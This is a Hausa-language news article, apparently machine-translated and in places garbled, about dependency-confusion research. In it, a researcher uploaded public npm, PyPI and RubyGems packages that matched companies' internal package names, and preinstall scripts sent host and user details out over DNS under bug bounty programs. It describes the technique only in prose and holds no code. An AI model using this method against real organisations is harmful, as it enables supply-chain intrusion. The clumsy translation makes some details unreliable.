'Yan kwanaki da suka gabata an saki hanya mai sauƙi mai sauƙi wanda ke ba da damar kai tsaye ga dogara ga aikace-aikace waɗanda aka haɓaka ta amfani da wuraren ajiya na cikin gida. Masu binciken wadanda suka gano matsalar sun sami damar gudanar da lambar ka a cikin sabobin ciki na kamfanoni 35, gami da PayPal, Microsoft, Apple, Netflix, Uber, Tesla, da Shopify.
An gudanar da satar bayanan ne a matsayin wani bangare na shirye-shiryen Bug Bounty, tare da aiki tare da kamfanonin da aka kaiwa hari, kuma tuni masu laifin sun amshi dala dubu 130.000 a matsayin alawus don gano raunin.
Hanyar ta dogara ne akan gaskiyar cewa kamfanoni da yawa suna amfani da daidaitattun abubuwan ajiya na NPM, PyPI da RubyGems a cikin aikace-aikacen su na ciki, kazalika da dogaro na cikin gida waɗanda ba a rarraba su a fili ko zazzagewa daga rumbun su ba.
Matsalar ita ce manajan kunshin kamar npm, pip da lu'u lu'u suna ƙoƙari su zazzage abubuwan dogaro na cikin kamfanonin, ko da daga wuraren ajiye jama'a. Don hari, kawai ayyana sunayen kunshin tare da masu dogaro da ciki kuma ƙirƙirar kunshinku tare da sunaye iri ɗaya a cikin wuraren ajiye jama'a na NPM, PyPI da RubyGems.
Matsalar ba takamaimai ga NPM, PyPI, da RubyGems ba, kuma ta bayyana kanta a kan wasu tsarin kamar NuGet, Maven, da Yarn.
Tunanin dabarun da aka gabatar ya zo ne bayan da mai bincike ya lura da bazata cewa a cikin lambar da aka samu a bainar jama'a da aka sanya akan GitHub, kamfanoni da yawa basa cire ambaton ƙarin dogaro daga bayyanannun fayiloli amfani dasu a cikin ayyukan cikin gida ko yayin aiwatar da ƙarin ayyuka. An samo irin waɗannan alamun a cikin lambar JavaScript don sabis ɗin yanar gizo, haka kuma a cikin ayyukan Node.JS, Python, da Ruby na kamfanoni da yawa.
Babban leaks suna da alaƙa da saka abun ciki daga fayilolin package.json a cikin lambar JavaScript da ake samu a bayyane yayin aikin ginin, haka kuma tare da amfani da ainihin abubuwan hanyar cikin kira (), waɗanda za a iya amfani dasu don yin hukunci kan sunaye masu dogaro.
Scan na yankuna kamfanoni miliyan da yawa sun bayyana sunayen kunshin JavaScript da yawa waxanda ba su cikin wurin ajiyar NPM. Bayan da ya tattara bayanai na sunayen kunshin na ciki, mai binciken ya yanke shawarar yin gwaji don satar kayan aikin kamfanonin da ke cikin shirye-shiryen Bug Bounty. Sakamakon ya ba da mamaki tasiri kuma mai binciken ya iya gudanar da lambar sa a wajan kwamfyutocin ci gaba da yawa da kuma sabobin da ke da alhakin gini ko gwaji bisa tsarin hadaka.
Lokacin sauke abubuwan dogaro, manajan kunshin npm, pip, da lu'u lu'u galibi sun haɗa fakitin daga manyan wuraren ajiye jama'a NPM, PyPI, da RubyGems, waɗanda aka ɗauka mafi fifiko.
Kasancewar irin waɗannan fakitoci masu suna iri ɗaya a cikin wuraren ajiyar kamfanoni masu zaman kansu ba a kula da su ba tare da nuna wani gargaɗi ko haddasa haɗari ba hakan na iya jawo hankalin masu gudanarwa. A cikin PyPI, lambar sigar ta rinjayi fifikon zazzagewa (ba tare da la’akari da wurin ajiyar ba, an zazzage sabon sigar kunshin). A cikin NPM da RubyGems, fifiko ya dogara ne kawai da ma'ajiyar ajiya.
Mai binciken ya sanya fakiti a cikin wuraren ajiya na NPM, PyPI, da RubyGems waɗanda ke haɗuwa da sunayen abubuwan dogaro na ciki waɗanda aka samo, ƙara lambar zuwa rubutun da ke gudana kafin shigarwa (wanda aka riga aka sanya a cikin NPM) don tattara bayanai game da tsarin da ƙaddamar da bayanin karɓa ga mai masaukin waje
Don isar da bayani game da nasarar kutse, keta shingen wuta da ke toshe hanyoyin zirga-zirga daga waje, hanyar shirya hanyoyin sadarwa ta hanyar sadarwa ta hanyar yarjejeniyar DNS. Lambar da ke gudana ta warware mai masaukin a yankin da ke kai hare-hare a ƙarƙashin ikon yankin, wanda ya ba da damar tattara bayanai game da ayyukan nasara a kan sabar DNS. Bayani game da mai masauki, sunan mai amfani da hanyar yanzu an wuce.
75% na duk bayanan hukuncin kisa da aka rubuta suna da alaƙa da zazzagewar kunshin NPM, da farko saboda gaskiyar cewa akwai mahimman ƙirar sunaye na JavaScript fiye da sunayen Python da Ruby.
Source: https://medium.com/